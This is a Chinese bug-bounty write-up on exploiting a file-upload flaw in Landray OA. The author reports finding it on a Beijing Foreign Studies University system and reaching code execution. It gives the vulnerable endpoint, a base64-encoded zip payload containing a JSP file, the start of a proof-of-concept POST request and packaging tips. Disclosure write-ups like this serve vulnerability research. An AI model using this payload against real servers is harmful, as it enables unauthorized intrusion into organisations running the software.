蓝凌OA漏洞SRC实战:指纹识别->代码执行
当前位置:点晴教程→知识管理交流
→『 技术文档交流 』
一.发现目标今天不小心渗透测试其它目标时点进了北京外国语大学的一个oa登陆界面 看着有点眼熟,于是去识别了一下指纹
蓝凌OA,老熟人,于是我们用一下历史漏洞打一下这个站 二.漏洞验证验证漏洞是否可以利用,可以访问该接口 https://127.0.0.1/api///sys/ui/sys_ui_extend/sysUiExtend.do?method=upload
页面如下 成功访问 有戏,那我们接着利用一下 三.漏洞利用构造上传文件,guyue.jsp和ui.ini,然后放在同一个文件夹下打包
然后将压缩包进行base64编码 UEsDBBQAAAAIAFh3PVjyEgrVagAAAHQAAAAJAAAAZ3V5dWUuanNwHchBCsIwEAXQveAdYqGQgOQCFZeuRU8wlE8z7TCJcVLx9qV9y3frXW4WS2U1Ud8liORronFBdVP7N8xMuuDShUHxO59mWilyjg8WeCpFeCTjrHGCvUDyJEu+4tPwtf3eqKvAjg4hDK6/b1BLAwQKAAAAAABqdz1YCbZnQiEAAAAhAAAABgAAAHVpLmluaWlkPWd1eXVlDQpuYW1lPWd1eXVlDQp0aHVtYj1ndXl1ZVBLAQI/ABQAAAAIAFh3PVjyEgrVagAAAHQAAAAJACQAAAAAAAAAIAAAAAAAAABndXl1ZS5qc3AKACAAAAAAAAEAGACFTpyagFLaAVLdOrSAUtoBHYjQR31S2gFQSwECPwAKAAAAAABqdz1YCbZnQiEAAAAhAAAABgAkAAAAAAAAACAAAACRAAAAdWkuaW5pCgAgAAAAAAABABgADo27rYBS2gFZ3ATDgFLaARn/z0d9UtoBUEsFBgAAAAACAAIAswAAANYAAAAAAA== poc如下 POST /api///sys/ui/sys_ui_extend/sysUiExtend.do?method=getThemeInfo HTTP/1.1 附上编码脚本 import base64 这里我踩了半个多小时的坑,需要直接将两个文件进行压缩,而不是先压缩成文件夹,再进行压缩 成功访问到我写入的文件路径
四.提交src教育src点到为止,不要上传马(bushi)
来源:https://mp.weixin.qq.com/s/DorHJncR89z9XvyTwalnFA 该文章在 2024/8/16 15:04:23 编辑过 |
关键字查询
相关文章
正在查询... |